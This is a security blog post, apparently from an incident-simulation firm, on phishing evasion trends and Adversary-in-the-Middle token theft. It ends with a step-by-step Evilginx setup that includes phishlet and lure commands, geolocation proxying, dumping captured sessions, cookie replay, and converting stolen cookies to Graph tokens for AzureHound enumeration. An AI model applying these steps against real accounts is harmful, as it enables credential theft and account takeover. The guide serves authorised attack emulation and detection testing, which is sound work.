Adapting to a changing environment is precisely what we have seen cybercriminals do as the boundaries of many organisations have become increasingly blurred, defences more layered, and identity compromise becoming the key to initial access. For many, this shift was forced upon them very quickly during the COVID-19 pandemic, where remote work capabilities were required at exceptionally short notice. Even those who had already embraced a remote work model faced revised threat models, as adversaries capitalised on globally increased exposure by evolving identity-centric attack techniques and targeting. Arguably, none were more representative of the refined tradecraft than Scattered Spider/Octo Tempest. They demonstrated exceptional knowledge of cloud environments and identity providers, which had not yet been seen among cybercriminal actors, and for many defenders, their intrusions are still among the best examples of their kind.
“Adapt or perish, now as ever, is nature’s inexorable imperative.”
– H. G. Wells
As reported in 2024’s Digital Defense Report by Microsoft, while the industry has seen a 41% increase in MFA adoption over the past year, threat actors have adapted, leading to a 146% growth in Adversary-in-the-Middle (AitM) phishing attacks. These attacks aim to automate the capture of valuable authentication tokens, compromising otherwise well-protected accounts. We can reasonably infer that this growth has been fuelled by the expansion of the Phishing-as-a-Service market, which significantly lowers the barriers to acquiring AitM phishing capabilities, allowing criminals to focus on their objectives. In addition to AitM phishing kits, infostealer malware families such as LummaC2, Vidar, and RedLine now dominate the malware landscape, supplying growing log marketplaces and underground “clouds of logs”.
In this blog post, marking the start of 2024’s Cyber Smart Week, we’ll explore four key aspects of phishing:
Throughout the week, you can expect in-depth analysis of emerging phishing trends, techniques, and campaigns. So keep an eye on our blog and socials for updates.
Identity providers, such as Entra ID, are predominantly built upon an authorisation standard known as OAuth 2.0. Central to how OAuth operates are two digital assets called tokens, which are issued upon the successful authentication of user credentials:
The access token is presented to resources in the header of HTTP requests (typically in the form of a cookie). These resources validate the signature, expiration time, and claims against the issuing authorisation server. Tokens may contain information (claims) such as the username, source IP, MFA, and any privileges a user holds. While the flow can vary between implementations, in the case of Entra ID, it looks like this:
As a result, possession of authentication tokens effectively grants ownership of an identity. Tokens can be transferred to other applications, allowing requests to be made under the context of the identity for which they were issued. Their utility is therefore wide ranging, from querying the Graph API through to navigating Microsoft 365 services in a browser session as the victim.
Aside from thematic observations, we have seen growing adoption of a variety of evasion techniques.
In most circumstances, links embedded within phishing messages are assessed by mail filters that employ network reputation databases and sandbox analysis to score the safety of the target:
Combining both approaches, and directing victims to a benign page on a trusted domain, will net the best possible result for campaign operators. Effectively, the landing pages serve as a means of ensuring only intended victims are redirected to the actual phishing kit, and other visitors see no immediate cause for suspicion:
A combination of tactics can help to achieve this:
Any service that grants users the ability to store and share links with the public has the potential to be used as a landing page. Examples include document collaboration platform such as OneNote, site builders such as Wix and Google Sites, and storage platforms such as Google GCS, Amazon S3, Azure Blob Storage and Cloudflare R2. Those that can serve up user-defined HTML or scripting languages, including Azure App Services and Amazon’s Elastic Beanstalk, may also be used to host the phishing kit itself.
Malicious artifacts that are hosted on such widely used platforms inherit the reputation of an otherwise legitimate service, and messages linking to them are therefore more likely to be successfully delivered to inboxes than if they were hosted on - for example - a compromised WordPress site. The same principle also helps to circumvent network intrusion detection systems. In addition to the evasion benefits and increasing the potential lifespan of campaign infrastructure, the use of legitimate services also has the potential to evoke greater trust from victims.
Cloud WAF platforms, such as Cloudflare, offer two main benefits to phishing campaigns:
One such example:
And the kit which loads after completing the turnstile challenge:
IP allowlisting may be used to constrain access to only the residential and commercial IP ranges relevant to the victimology. Those who do not connect from within a permitted range are presented an HTTP 403 response or are redirected elsewhere. An automated scanner connecting from within the infrastructure of a security vendor or VPN service could not observe the redirect or phishing kit, and would therefore have no reason to classify the URL as suspicious.
After becoming a feature of daily life during the pandemic, trust in QR codes has become implicit for many people. They’ve been widely seen in legitimate use cases like contact tracing, restaurant menus and mobile booking apps. When scanned, QR codes present the user with a URL to visit to continue their action, be that to download a file or be taken to a form - the same objective as phishing.
In the context of phishing, using QR codes in place of embedded links has the effect of moving a detectable threat from the corporate environment to the mobile device of the victim, where detection capability is typically much lower. There is no target URL for mail filters to inspect (although, some platforms now have the ability to identify and parse QR codes). The campaign operator also retains full control of the redirect URL, without the risk of it being proxied through an inspection service like Defender for Office 365’s Safe Links.
It has been most common to see QR codes being used in combination with trusted brands, including Adobe, Microsoft and DocuSign, with lures that directly instruct the recipient to scan the image and complete a task such as review a document.
Email thread hijacking (or conversation hijacking) is by no means new. The technique involves replying to an existing email chain, sourced either through account compromise or an exfiltrated inbox, to give credibility to a malicious message. In 2017 it was seen used by a North Korean APT spear phishing campaign dubbed “FreeMilk”, in 2018 more broadly as part of a URSNIF malspam campaign, and from 2019 onwards by other malware families such as Emotet and Qakbot:
In more recent years we have seen this technique expand to other cybercrime practices, including Business Email Compromise (BEC):
Our observation has been that BEC replies may be used either of two ways:
A user interacts with a link, is taken through a redirect, completes the Cloudflare turnstile, and lands on what looks like an Office 365 login: now what?
As adoption of MFA and mitigations such as Conditional Access have become more widespread, the efficacy of traditional phishing kits has drastically reduced. Compromised username and password pairs can still be used to attempt sign-in to cloud accounts, but run a high risk of being halted by MFA, whereas OAuth based systems assume authentication has already successfully completed when presented valid tokens.
Adversary-in-the-Middle (AitM) attacks involve directing a user to connect to a target application, such as Office 365 or Okta, through an adversary-controlled proxy server. The server proxies the connection to the legitimate site to which the victim submits their username and password, and completes any MFA challenges. While the victim appears to sign into the application, they are effectively signing the adversary into it and providing them both their cleartext credentials and resulting authentication tokens:
Restrictive access policies may also require the use of commercial VPN’s or residential proxies to fall within geofencing, and browser fingerprint spoofing to bypass user agent checks.
Publicly available tools and Platform-as-a-Service offerings already exist to automate the handling of DNS, proxying of connection and capture of tokens - so this is a capability with an exceptionally low barrier to obtain.
One such tool that can be used to automate AitM attacks is Evilginx, an open-source framework developed by renowned offensive security researcher Kuba Gretzky. The subject of open-source offensive security tooling (OST) is often a contentious one in defensive circles. We take the perspective that OST is going to be developed and abused regardless, so you can either:
Until the day that open-source OST does not exist, or it in no way reflects what threat actors use, then it is of net benefit to include it in your security program.
To begin with, you will require:
I’d encourage you to notify your domain registrar and AWS (using this form) to forewarn them of the planned activity, to avoid you having your accounts nuked.
Create ns1 and ns2 glue records for your domain, pointing them at your elastic IP. In Namecheap, it’d be done as follows:
You’ll need to wait a while for the NS records to roll out. This may be 10-60 minutes.
While waiting, you can set up Evilginx:
sudo snap install
go node
cd /opt
git clone https://github.com/kgretzky/evilginx2
cd evilginx2
make
mv build/evilginx2 .
Grab whatever extra phishlets you need from GitHub, for example:
Unless recently maintained, they may require some modification to work properly.
When the NS records have propagated out, continue with the Evilginx setup. If using systemd-resolve, ensure this is stopped to allow Evilginx to listen on port 53:
sudo systemctl stop systemd-resolved
To continue to resolve DNS, you’ll need to define new nameservers in /etc/resolv.conf
.
Cloudflare may be used in combination with Evilginx infrastructure. Have a read of this blog post to see how.
As an example, to deploy an Office 365 themed phish with URL prefix “m365” you’d enter the following:
sudo ./evilginx
config domain <domain>
config ipv4 external <elastic IP>
phishlets hostname o365 <your_domain>
phishlets enable o365
Optionally, you can also force visitors who do not include your unique URL parameters to be redirected elsewhere:
phishlets unauth_url o365 <https://outlook.office.com>
Evilginx can also be configured to proxy outbound traffic through an HTTP or SOCKS proxy. A potential use case for this could be ensuring that traffic to the targeted service egresses a specific geolocation, using a local HTTP proxy and commercial VPN or residential proxy service:
proxy
proxy type socks5
proxy address 127.0.0.1
proxy port 1080
proxy enable
When everything is hanging together properly, the enable command will issue the certificates required to serve the phishlet subdomains, and you’ll be presented with a successful message. After seeing this, you can initialise a lure and record the target URL:
lures create o365
lures get-url 0
The unique path serves both to ensure that requests to the server are authorised and to direct the recipient to the intended template:
The Evilginx console will confirm when credentials and tokens have been captured:
As above, to dump the captured session objects, type:
sessions <id>
There are many tools available to leverage the captured tokens, but for demonstration purposes, we’ll look at two options and how they can be combined.
The Cookie Editor plugin for Chromium based browsers is able to import the JSON object straight out of the Evilginx console:
Imported cookies are loaded upon page refresh, presenting an authenticated session as the victim:
The Token Tactics PowerShell module can be passed the ESTSAUTHPERSISTENT cookie from Evilginx or use device auth flow to obtain a refresh token from the Graph API:
Get-AzureTokenFromESTSCookie - ESTSAuthCookie "value of the ESTSAUTHPERSISTENT cookie"
Get-AzureToken -Client MSGraph
This module has a single pre-requisite which can be installed with: Install-Module -Name Az -AllowClobber -Scope CurrentUser
Using the refresh token returned by Token Tactics, AzureHound can then run under the context of the victim account to identify potential escalation pathways in the target tenant:
./azurehound -r "value of the refresh token" list --tenant tenant.domain.here -o output.json
Import the outputted JSON into the BloodHound web UI, and start finding interesting paths:
The authors of BloodHound Enterprise have some fantastic posts on their blog about Azure and Active Directory privilege management, pathfinding, and offensive tradecraft. It’s well worth your time giving it a visit if these subjects are of interest to you.
Following test execution, it’s important to determine whether any detections have been associated with the impacted entities and if those detections offer adequate coverage to disrupt a genuine incident. It is also important to understand what relevant telemetry has been generated, as this could not only help establish a detailed timeline of events but may also be unique enough to support the creation of new detections. Beyond evaluating detection capability, explore potential configuration changes and hardening opportunities that may reduce the likelihood of the emulated attack succeeding.
If you’d like to discuss any of this blog in more detail, or have an interest in our Incident Simulation engagements, please get in touch with us.